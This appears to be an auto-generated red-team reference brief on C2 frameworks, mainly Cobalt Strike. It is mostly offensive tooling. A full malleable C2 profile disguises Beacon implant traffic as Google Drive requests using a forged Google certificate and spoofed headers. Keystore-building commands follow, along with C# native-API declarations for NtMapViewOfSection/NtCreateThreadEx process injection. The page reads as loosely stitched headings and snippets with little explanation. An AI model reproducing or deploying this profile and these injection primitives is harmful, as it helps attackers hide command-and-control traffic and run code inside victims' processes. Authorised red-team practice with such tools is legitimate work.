Why this topic matters
C2 Frameworks matters because it changes how an operator frames the problem, chooses validation steps and decides what evidence is strong enough to keep. In real work, weak handling of this topic leads to wasted time, noisy testing and softer findings.
This brief treats c2 frameworks as a reusable field reference. The focus is on attack surface, decision points, practical workflow and the public material that is worth keeping nearby when you need to execute, verify or explain the subject under pressure.
Core coverage
The points below capture the main workflows, concepts, tools and operator decisions associated with c2 frameworks.
- C2 frameworks
- Poshc2
- Havoc c2 framework
- Brute ratel
- Cobalt strike
- Start the Cobalt Strike team server without a custom C2 profile
- Start the Cobalt Strike client
- On teamserver connect
- Cobalt strike dashboard
- Listener create
Commands and snippets
#
# Google Drive
#
# Author: @bluscreenofjeff
#
#set https cert info
https-certificate {
set CN "*.google.com"; #Common Name
set O "Google Inc"; #Organization Name
set C "US"; #Country
set L "Mountain View"; #Locality
set ST "California"; #State or Province
set validity "365"; #Number of days the cert is valid for
}
#default Beacon sleep duration and jitter
set sleeptime "60000";
set jitter "20";
#default useragent for HTTP comms
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
#IP address used to indicate no tasks are available to DNS Beacon
set dns_idle "8.8.4.4";
#Force a sleep prior to each individual DNS request. (in milliseconds)
set dns_sleep "0";
#Maximum length of hostname when uploading data over DNS (0-255)
set maxdns "235";
http-get {
set uri "/viewerng/meta";
client {
header "Accept" "text/html,application/xml;*/*;";
header "Accept-Encoding" "gzip, deflate";
header "Host" "drive.google.com";
header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
#session metadata
metadata {
base64url;
netbios;
base64url;
parameter "id";
}
parameter "u" "0";
}
server {
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
header "Connection" "close";
#Beacon's tasks
output {
print;
}
}
}
http-post {
set uri "/viewersng/meta";
set verb "GET";
client {
header "Accept" "text/html,application/xml;*/*;";
header "Accept-Encoding" "gzip, deflate";
header "Host" "drive.google.com";
header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
output {
base64url;
netbios;
base64url;
parameter "id";
}
#session ID
id {
parameter "u";
}
}
server {
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
header "Connection" "close";
output {
print;
}
}
}
#change the stager server
http-stager {
server {
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
}
}openssl pkcs12 -inkey private.key -in public.crt -export -out c2_profile.pkcs12 keytool -importkeystore -srckeystore c2_profile.pkcs12 -srcstoretype pkcs12 -destkeystore c2_profile.store
using System;
using System.Runtime.InteropServices;
namespace NtMapViewOfSection
{
internal class Native
{
[DllImport("ntdll.dll")]
public static extern uint NtCreateSection(
ref IntPtr SectionHandle,
uint DesiredAccess,
IntPtr ObjectAttributes,
ref ulong MaximumSize,
uint SectionPageProtection,
uint AllocationAttributes,
IntPtr FileHandle);
[DllImport("ntdll.dll")]
public static extern uint NtMapViewOfSection(
IntPtr SectionHandle,
IntPtr ProcessHandle,
out IntPtr BaseAddress,
IntPtr ZeroBits,
IntPtr CommitSize,
IntPtr SectionOffset,
out ulong ViewSize,
uint InheritDisposition,
uint AllocationType,
uint Win32Protect);
[DllImport("ntdll.dll")]
public static extern uint NtCreateThreadEx(
out IntPtr threadHandle,
uint desiredAccess,
IntPtr objectAttributes,
IntPtr processHandle,
IntPtr startAddress,
IntPtr parameter,
bool createSuspended,
int stackZeroBits,
int sizeOfStack,
int maximumStackSize,
IntPtr attributeList);
}
}Curated public references
- Nmap · Man.htmlnmap.org/book/man.html
- BloodHound Documentationbloodhound.specterops.io/
- GitHub · fortra / impacketgithub.com/fortra/impacket
- MITRE ATT&CKattack.mitre.org/